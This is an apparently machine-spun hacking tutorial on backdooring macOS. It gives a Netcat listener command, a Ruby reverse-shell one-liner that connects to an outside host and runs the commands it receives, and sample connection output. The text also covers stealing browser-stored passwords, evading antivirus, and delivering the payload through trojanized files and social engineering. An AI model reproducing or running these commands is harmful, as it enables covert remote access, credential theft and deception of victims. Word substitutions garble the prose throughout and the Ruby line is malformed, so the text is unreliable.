Note 1: Begin a Netcat listener
To start victimization Ruby as a backdooring mechanism, open a terminal in Kali (or any Unix-based package with Netcat installed), and use the below Netcat command to start out a observer. this is often where the target macOS device can hook up with once the Ruby command is executed.
nc -v -l -p 9999
Netcat can open a listening (-l) port on each out there interface.
If you are operating in an exceedingly native network, the Netcat observer are out there on your native address (e.g., 192.168.0.X). If the observer is started on a virtual personal server (VPS), make certain to use the scientific discipline address of your VPS in future Ruby commands.
The port (-p) variety (9999) is bigoted and may be modified.
The verboseness (-v) argument is vital here. while not this, once a association to the target MacBook, Mac Pro, or the other pc running macOS is established, the Netcat terminal won’t modification. to supply some variety of indication the payload was dead with success, modify verboseness.
Note 2: Use Ruby to form a Backdoor
Execute this within the macOS device to form a backdoor to the Netcat listener:
ruby -rsocket -e “c=TCPSocket.new(‘1.2.3.4′,’9999′);while(cmd=c.gets);IO.popen(cmd,’r’)ioend”
This one-liner higher than can produce a transmission control protocol socket (TCPSocket.new) and a minute loop (while … end) that claims “while there is knowledge coming back in, assign it to cmd, run the input as a shell command, and print it back in our terminal (IO.popen(cmd,’r’)io).” basically, we tend to’re telling Ruby to require the command we submit, execute it, interpret the output, and send it back to America … over and once more till we tend to break the association to the macOS device.
Remember to alter the scientific discipline address (1.2.3.4) and port variety (9999) to match the Netcat observer created within the previous step. this could be an area network scientific discipline address or scientific discipline address of your VPS. On the attacker’s system (as shown below), the Netcat terminal can show a replacement association was established.
nc -v -l -p 9999
listening on [any] 9999 …
connect to [192.168.1.55] from (UNKNOWN) [192.168.1.31] 50328
Situational-awareness and post-exploitation attacks will begin. If this Ruby command is embedded into a trojanized PDF and go by the target, you may not have root access. therein case, there square measure many ways that of gaining privilege access. If Ruby was accustomed physically backdoor a macOS device, you’ll need root and may begin selling passwords hold on within the target’s internet browsers. Either way, this Ruby command can completely bypass antivirus software package like Avast and AVG.
Note 3: Use a Social Engineering Attack
Such payloads is executed employing a USB Rubby ducky or simply embedded into AppleScripts and sent to the victim. There ar some ways to induce the payload to the target, however you will need to utilize your social engineering skills to induce them to open it.
Just as I did with the Python, Tclsh, or Bash one-liners, below could be a story that illustrates however simple it’d be for a hacker to share a trojanized file, during this case, AN AppleScript. whereas this story is totally fictional and hypothetic, I did take a look at the featured Ruby payload against macOS chain wherever Avast antivirus computer code was put in.
